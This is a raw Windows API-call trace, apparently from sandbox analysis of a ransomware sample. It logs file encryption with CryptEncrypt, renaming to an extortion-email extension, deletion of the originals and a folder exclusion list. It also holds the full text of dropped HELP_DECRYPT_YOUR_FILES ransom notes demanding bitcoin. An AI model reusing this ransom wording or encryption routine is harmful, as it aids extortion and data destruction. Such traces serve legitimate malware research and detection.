	[0173.821] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8fb0) returned 1
	[0173.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.821] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0173.821] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.821] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0173.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.822] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0173.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.822] CryptDestroyKey (hKey=0xfb8fb0) returned 1
	[0173.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.823] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0173.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.823] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0173.823] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.823] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.824] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.827] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0173.827] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.827] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0173.830] CloseHandle (hObject=0x39c) returned 1
	[0173.831] CloseHandle (hObject=0x390) returned 1
	[0173.831] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml")) returned 1
	[0173.834] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml")) returned 0
	[0173.834] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.835] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.835] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.835] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.835] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}"
	[0173.835] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*"
	[0173.836] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.836] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.836] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0173.836] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.837] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.837] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.840] CloseHandle (hObject=0x388) returned 1
	[0173.840] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.842] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0173.843] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.843] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.843] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.843] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.843] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0173.844] CloseHandle (hObject=0x388) returned 1
	[0173.844] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.844] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.845] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.845] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0173.845] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.846] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.846] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0173.849] CloseHandle (hObject=0x388) returned 1
	[0173.849] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.850] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.850] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0173.852] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.852] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.855] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.855] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.855] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0173.856] CloseHandle (hObject=0x388) returned 1
	[0173.856] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x812478d3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8126d98b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.857] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned 84
	[0173.857] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.857] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*") returned 0x54
	[0173.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.858] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="windows") returned 0x0
	[0173.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.858] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="boot") returned 0x0
	[0173.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.858] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.858] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="temp") returned 0x0
	[0173.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="program files") returned 0x0
	[0173.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="appdata") returned 0x0
	[0173.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.860] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="application data") returned 0x0
	[0173.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.860] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="winnt") returned 0x0
	[0173.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.860] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="tmp") returned 0x0
	[0173.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.860] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="cache") returned 0x0
	[0173.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.861] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.861] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="webcache") returned 0x0
	[0173.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.861] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.862] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.862] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.862] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="packages") returned 0x0
	[0173.862] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.862] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="cookies") returned 0x0
	[0173.862] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.862] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpSrch="programdata") returned 0x0
	[0173.862] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.863] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x812478d3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8126d98b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.863] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811fb0d5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x811fb0d5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x811fb0d5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8126d98b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8126d98b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8126d98b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812478d3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x812478d3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8126d98b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812478d3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x812478d3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x812478d3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0173.863] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.863] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0173.864] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0173.864] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}"
	[0173.864] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\"
	[0173.864] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov"
	[0173.864] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov"
